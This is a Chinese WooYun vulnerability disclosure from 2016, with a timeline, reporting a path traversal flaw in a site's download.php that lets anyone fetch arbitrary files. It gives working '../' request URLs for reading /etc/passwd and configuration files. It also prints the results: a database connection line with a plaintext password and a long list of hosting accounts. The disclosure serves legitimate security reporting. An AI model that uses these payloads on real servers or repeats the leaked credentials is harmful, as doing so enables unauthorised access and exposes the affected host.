乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-04: 细节已通知厂商并且等待厂商处理中 2016-01-07: 厂商已经确认,细节仅向厂商公开 2016-01-17: 细节向核心白帽子及相关领域专家公开 2016-01-27: 细节向普通白帽子公开 2016-02-02: 厂商已经修复漏洞并主动公开,细节向公众公开
rt
目标:http://**.**.**.**物理路径:/home/sinovant/public_html/download.php构造,
http://**.**.**.**/download.php?file=../../../public_html/download.php
下载配置文件,
http://**.**.**.**/download.php?file=../../../public_html/config/dbconnect.php
dbconnect.php中
$db = mysqli_connect("localhost","sinovant_sino","5geHX-rf6s4T", "sinovant_en");
/etc/passwd下载,
http://**.**.**.**/download.php?file=../../../../../etc/passwd
passwd中,
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinrpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologinabrt:x:499:499::/etc/abrt:/sbin/nologinnscd:x:28:28:NSCD Daemon:/:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinnslcd:x:65:55:LDAP Client User:/:/sbin/nologinsaslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologintcpdump:x:72:72::/:/sbin/nologinoprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinqemu:x:107:107:qemu user:/:/sbin/nologinnamed:x:25:25:Named:/var/named:/sbin/nologinmysql:x:497:493:MySQL server:/var/lib/mysql:/bin/bashcpanelhorde:x:500:500::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshellmailnull:x:47:47:Exim:/var/spool/mqueue:/bin/falsedovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologindovenull:x:496:492:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologincpanel:x:32001:502::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshellcpanelphpmyadmin:x:32002:503::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshellcpanelphppgadmin:x:32003:504::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshellcpanelroundcube:x:32004:505::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshellmailman:x:32005:506::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshellcpanellogin:x:32007:509::/var/cpanel/userhomes/cpanellogin:/usr/local/cpanel/bin/noshellcpaneleximfilter:x:32008:510::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshellcpaneleximscanner:x:32009:511::/var/cpanel/userhomes/cpaneleximscanner:/usr/local/cpanel/bin/noshellcpses:x:495:491::/var/cpanel/cpses:/sbin/nologinclamav:x:32010:512::/home/clamav:/sbin/nologinglamor:x:503:515::/home/glamor:/usr/local/cpanel/bin/noshelldashan:x:504:516::/home/dashan:/bin/falseglobexas:x:505:517::/home/globexas:/usr/local/cpanel/bin/noshellaaguangz:x:506:518::/home/aaguangz:/usr/local/cpanel/bin/noshellvenezuel:x:509:521::/home/venezuel:/usr/local/cpanel/bin/noshellvzcom:x:512:524::/home/vzcom:/usr/local/cpanel/bin/noshellfasunshi:x:513:525::/home/fasunshi:/usr/local/cpanel/bin/noshellwemakew:x:515:527::/home/wemakew:/usr/local/cpanel/bin/noshellwt24:x:516:528::/home/wt24:/usr/local/cpanel/bin/noshellxdmotion:x:517:529::/home/xdmotion:/usr/local/cpanel/bin/noshellxouweich:x:518:530::/home/xouweich:/usr/local/cpanel/bin/noshellygagolf:x:521:533::/home/ygagolf:/usr/local/cpanel/bin/noshellbmlond:x:524:536::/home/bmlond:/usr/local/cpanel/bin/noshellinnova:x:526:538::/home/innova:/usr/local/cpanel/bin/noshelltectonic:x:527:539::/home/tectonic:/usr/local/cpanel/bin/noshelltheonech:x:528:540::/home/theonech:/usr/local/cpanel/bin/noshelltherainb:x:529:541::/home/therainb:/usr/local/cpanel/bin/noshelltitletra:x:532:544::/home/titletra:/usr/local/cpanel/bin/noshellbcnlisti:x:536:548::/home/bcnlisti:/usr/local/cpanel/bin/noshelllinkesp:x:538:550::/home/linkesp:/usr/local/cpanel/bin/noshellcnftmsgl:x:540:552::/home/cnftmsgl:/usr/local/cpanel/bin/noshellricard:x:544:556::/home/ricard:/usr/local/cpanel/bin/noshellproandre:x:548:560::/home/proandre:/usr/local/cpanel/bin/noshelldaanaa:x:550:562::/home/daanaa:/usr/local/cpanel/bin/noshellintws:x:551:563::/home/intws:/usr/local/cpanel/bin/noshellbassetti:x:553:565::/home/bassetti:/usr/local/cpanel/bin/noshellschoolof:x:554:566::/home/schoolof:/bin/falseriviera:x:555:567::/home/riviera:/usr/local/cpanel/bin/noshellgoodplus:x:559:571::/home/goodplus:/usr/local/cpanel/bin/noshellmovieb:x:562:574::/home/movieb:/usr/local/cpanel/bin/noshelloscarfu:x:563:575::/home/oscarfu:/usr/local/cpanel/bin/noshellkhtcn:x:564:576::/home/khtcn:/usr/local/cpanel/bin/noshellsinoh:x:565:577::/home/sinoh:/usr/local/cpanel/bin/noshellamwh:x:568:580::/home/amwh:/usr/local/cpanel/bin/noshellhorses:x:571:583::/home/horses:/usr/local/cpanel/bin/noshellavateq:x:575:587::/home/avateq:/usr/local/cpanel/bin/noshellprocuras:x:579:591::/home/procuras:/usr/local/cpanel/bin/noshellbrockhou:x:583:595::/home/brockhou:/usr/local/cpanel/bin/noshelldeltatra:x:585:597::/home/deltatra:/bin/falsecafejoya:x:586:598::/home/cafejoya:/usr/local/cpanel/bin/noshellblacksin:x:589:601::/home/blacksin:/usr/local/cpanel/bin/noshellcxtcl:x:595:607::/home/cxtcl:/usr/local/cpanel/bin/noshelldelidelu:x:596:608::/home/delidelu:/usr/local/cpanel/bin/noshelldisplayw:x:599:611::/home/displayw:/usr/local/cpanel/bin/noshelleverbl:x:603:615::/home/everbl:/usr/local/cpanel/bin/noshellgfacn:x:604:616::/home/gfacn:/usr/local/cpanel/bin/noshellharvest:x:606:618::/home/harvest:/usr/local/cpanel/bin/noshellimeicana:x:611:623::/home/imeicana:/usr/local/cpanel/bin/noshellinvesthu:x:612:624::/home/investhu:/usr/local/cpanel/bin/noshellmore:x:619:631::/home/more:/usr/local/cpanel/bin/noshellnewgr:x:620:632::/home/newgr:/usr/local/cpanel/bin/noshellofasia:x:622:634::/home/ofasia:/usr/local/cpanel/bin/noshellstarh:x:631:643::/home/starh:/usr/local/cpanel/bin/noshellsuperpr:x:635:647::/home/superpr:/usr/local/cpanel/bin/noshellsinohost:x:638:650::/home/sinohost:/usr/local/cpanel/bin/noshellsinoprep:x:639:651::/home/sinoprep:/usr/local/cpanel/bin/noshellsinosem:x:640:652::/home/sinosem:/usr/local/cpanel/bin/noshellbvi:x:641:653::/home/bvi:/usr/local/cpanel/bin/noshellmeenaefi:x:644:656::/home/meenaefi:/usr/local/cpanel/bin/noshellmychinab:x:645:657::/home/mychinab:/usr/local/cpanel/bin/noshellchinetog:x:648:660::/home/chinetog:/usr/local/cpanel/bin/noshellsinovant:x:649:661::/home/sinovant:/usr/local/cpanel/bin/noshellsookstv:x:651:663::/home/sookstv:/usr/local/cpanel/bin/noshellperspect:x:652:664::/home/perspect:/usr/local/cpanel/bin/noshellisaisr:x:656:668::/home/isaisr:/usr/local/cpanel/bin/noshelltrcsd:x:659:671::/home/trcsd:/usr/local/cpanel/bin/noshelllongan:x:661:673::/home/longan:/usr/local/cpanel/bin/noshellprimobik:x:664:676::/home/primobik:/usr/local/cpanel/bin/noshellchinaweb:x:667:679::/home/chinaweb:/usr/local/cpanel/bin/noshellalex:x:669:681::/home/alex:/usr/local/cpanel/bin/noshellmnopal:x:671:683::/home/mnopal:/usr/local/cpanel/bin/noshellafrosh:x:672:684::/home/afrosh:/usr/local/cpanel/bin/noshellcrystalv:x:673:685::/home/crystalv:/usr/local/cpanel/bin/noshellcoffeema:x:675:687::/home/coffeema:/usr/local/cpanel/bin/noshellmcit:x:677:689::/home/mcit:/usr/local/cpanel/bin/noshellnihaopul:x:679:691::/home/nihaopul:/usr/local/cpanel/bin/noshellsekomlan:x:687:699::/home/sekomlan:/usr/local/cpanel/bin/noshelltriangle:x:689:701::/home/triangle:/usr/local/cpanel/bin/noshellsinocate:x:691:703::/home/sinocate:/usr/local/cpanel/bin/noshellsinodom:x:692:704::/home/sinodom:/usr/local/cpanel/bin/noshellsoucysha:x:694:706::/home/soucysha:/usr/local/cpanel/bin/noshelldmse:x:695:707::/home/dmse:/usr/local/cpanel/bin/noshellfloat:x:700:712::/home/float:/usr/local/cpanel/bin/noshellboxandpa:x:703:715::/home/boxandpa:/usr/local/cpanel/bin/noshellsigmanes:x:704:716::/home/sigmanes:/usr/local/cpanel/bin/noshelltivesto:x:707:719::/home/tivesto:/usr/local/cpanel/bin/noshellcpanelrrdtool:x:32011:720::/var/cpanel/userhomes/cpanelrrdtool:/usr/local/cpanel/bin/noshellepiquewi:x:708:721::/home/epiquewi:/usr/local/cpanel/bin/noshellcpanelconnecttrack:x:32012:722::/var/cpanel/userhomes/cpanelconnecttrack:/usr/local/cpanel/bin/noshellbusiness:x:709:723::/home/business:/usr/local/cpanel/bin/noshellma:x:32013:32013::/home/ma:/bin/bashhossanna:x:711:725::/home/hossanna:/usr/local/cpanel/bin/noshelleditingt:x:712:726::/home/editingt:/usr/local/cpanel/bin/noshellgrooveen:x:713:727::/home/grooveen:/usr/local/cpanel/bin/noshellofficeac:x:714:728::/home/officeac:/usr/local/cpanel/bin/noshell
部分url,
http://**.**.**.**/download.php?file=../../../public_html/index.phphttp://**.**.**.**/download.php?file=../../../public_html/download.phphttp://**.**.**.**/download.php?file=../../../public_html/config/dbconnect.phphttp://**.**.**.**/download.php?file=../../../public_html/admin/login.phphttp://**.**.**.**/download.php?file=../../../../../etc/passwd……
dbconnect.php中,
..
危害等级:高
漏洞Rank:16
确认时间:2016-01-07 18:23
已將事件通知有關機構
2016-02-02:相關機構回報已修復漏洞